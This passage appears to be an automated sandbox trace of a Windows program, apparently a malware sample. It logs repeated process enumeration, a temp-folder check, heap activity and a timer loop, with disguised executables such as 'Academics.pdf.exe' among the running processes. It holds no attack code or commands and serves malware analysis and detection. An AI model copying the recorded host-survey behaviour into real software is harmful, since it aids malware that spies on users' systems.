th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.126] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.126] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.127] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0287.128] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.129] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.130] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0287.131] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0287.131] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0287.132] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0287.133] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.134] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0287.135] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0287.136] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0287.137] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0287.137] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0287.138] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0287.139] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0287.139] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0287.140] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0287.141] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0287.141] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0287.142] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0287.142] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0287.143] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0287.144] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0287.144] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0287.145] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0287.146] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0287.148] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0287.148] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0287.149] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.150] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0287.151] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0287.152] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0287.153] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0287.154] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0287.155] CloseHandle (hObject=0x294) returned 1 [0287.155] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0287.155] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0287.155] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0287.157] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.158] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0287.159] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0287.160] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.161] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0287.161] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0287.162] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0287.163] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0287.164] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0287.165] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0287.181] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0287.181] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0287.181] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0287.181] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0287.181] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0287.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0287.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0287.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0287.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0287.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0287.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0287.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0287.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0287.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0287.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0287.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0287.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0287.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0287.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0287.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0287.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0287.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0287.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0287.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0287.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0287.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0287.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0287.183] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0287.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0287.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0287.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0287.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0287.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0287.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0287.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0287.184] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0287.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0287.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0287.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0287.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0287.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0287.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0287.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0287.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0287.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0287.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0287.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0287.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0287.185] timeGetTime () returned 0x47d49 [0287.185] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.185] Sleep (dwMilliseconds=0xa) [0287.197] timeGetTime () returned 0x47d58 [0287.197] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.197] Sleep (dwMilliseconds=0xa) [0287.212] timeGetTime () returned 0x47d68 [0287.212] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.212] Sleep (dwMilliseconds=0xa) [0287.227] timeGetTime () returned 0x47d77 [0287.228] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.228] Sleep (dwMilliseconds=0xa) [0287.243] timeGetTime () returned 0x47d87 [0287.243] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.243] Sleep (dwMilliseconds=0xa) [0287.259] timeGetTime () returned 0x47d97 [0287.259] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.259] Sleep (dwMilliseconds=0xa) [0287.275] timeGetTime () returned 0x47da6 [0287.275] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.275] Sleep (dwMilliseconds=0xa) [0287.292] timeGetTime () returned 0x47db6 [0287.292] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.292] Sleep (dwMilliseconds=0xa) [0287.306] timeGetTime () returned 0x47dc5 [0287.306] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.306] Sleep (dwMilliseconds=0xa) [0287.321] timeGetTime () returned 0x47dd5 [0287.321] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.321] Sleep (dwMilliseconds=0xa) [0287.337] timeGetTime () returned 0x47de5 [0287.337] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.337] Sleep (dwMilliseconds=0xa) [0287.352] timeGetTime () returned 0x47df4 [0287.352] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.353] Sleep (dwMilliseconds=0xa) [0287.368] timeGetTime () returned 0x47e04 [0287.368] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0287.368] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0287.368] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0287.369] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0287.369] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0287.369] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.369] Sleep (dwMilliseconds=0xa) [0287.384] timeGetTime () returned 0x47e13 [0287.384] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.384] Sleep (dwMilliseconds=0xa) [0287.399] timeGetTime () returned 0x47e23 [0287.399] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.399] Sleep (dwMilliseconds=0xa) [0287.415] timeGetTime () returned 0x47e33 [0287.415] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.415] Sleep (dwMilliseconds=0xa) [0287.431] timeGetTime () returned 0x47e42 [0287.431] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.431] Sleep (dwMilliseconds=0xa) [0287.446] timeGetTime () returned 0x47e52 [0287.446] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0287.446] Sleep (dwMilliseconds=0xa) [0287.462] timeGetTime () returned 0x47e61 [0287.462] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 